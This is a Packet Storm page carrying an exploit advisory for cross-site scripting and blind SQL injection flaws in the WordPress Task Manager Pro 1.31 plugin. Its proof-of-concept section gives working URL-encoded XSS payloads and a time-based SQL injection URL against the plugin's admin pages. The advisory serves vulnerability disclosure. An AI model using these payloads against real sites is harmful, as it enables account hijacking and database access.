exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Task Manager Pro 1.31 Cross Site Scripting

WordPress Task Manager Pro 1.31 Cross Site Scripting
Posted Jul 19, 2017
Authored by 8bitsec

WordPress Task Manager Pro version 1.31 suffers from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | 0ab5b7ff53cae033bdc9d97690414d0d194da945e56fab67995ebaee9abbcdc2

WordPress Task Manager Pro 1.31 Cross Site Scripting

Change Mirror Download
# Exploit Title: WordPress Task Manager Pro 1.31 - Multiple vulnerabilities
# Date: 2017-07-11
# Exploit Author: 8bitsec
# Vendor Homepage: https://www.w3bd.com/
# Software Link: http://codecanyon.net/item/task-manager-pro-all-in-one-project-based-task-management-plugin-for-wordrpress/19864872
# Version: 1.31
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.5]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec

Release Date:
=============
2017-07-11

Product & Service Introduction:
===============================
Task Manager Pro is a full and functional task management plugin for wordpress.

Vulnerability Disclosure Timeline:
==================================
2017-07-10: Found the vulnerabilities.
2017-07-10: Reported to vendor.
2017-07-11: No response.
2017-07-11: Published.

Technical Details & Description:
================================

Multiple authenticated XSS vulnerabilities found logged as a low privileged user.

Blind SQL Injection on task-details page task parameter.

Proof of Concept (PoC):
=======================

Authenticated Stored XSS:

Logged as a follower, the lowest privileged user.
Write the payload in the 'Add a comment' section

Authenticated Reflected XSS

On task-edit, task-details, project-details pages:

https://localhost/wp-admin/admin.php?page=task-edit&task=8%2F%22%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E
https://localhost/wp-admin/admin.php?page=task-details&task=6%22%2F%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E
https://localhost/wp-admin/admin.php?page=project-details&project=%22%2F%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E

Authenticated Stored XSS

Logged as a user with edit privileges:
Edit Task Section. Task Name & Time Estimation fields are vulnerable.

Blind SQL Injection

Logged as a follower:
# 6 and sleep(1) and 1=1
https://localhost/wp/wp-admin/admin.php?page=task-details&task=6+and+sleep(1)+and+1%3D1

Credits & Authors:
==================
8bitsec - [https://twitter.com/_8bitsec]
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close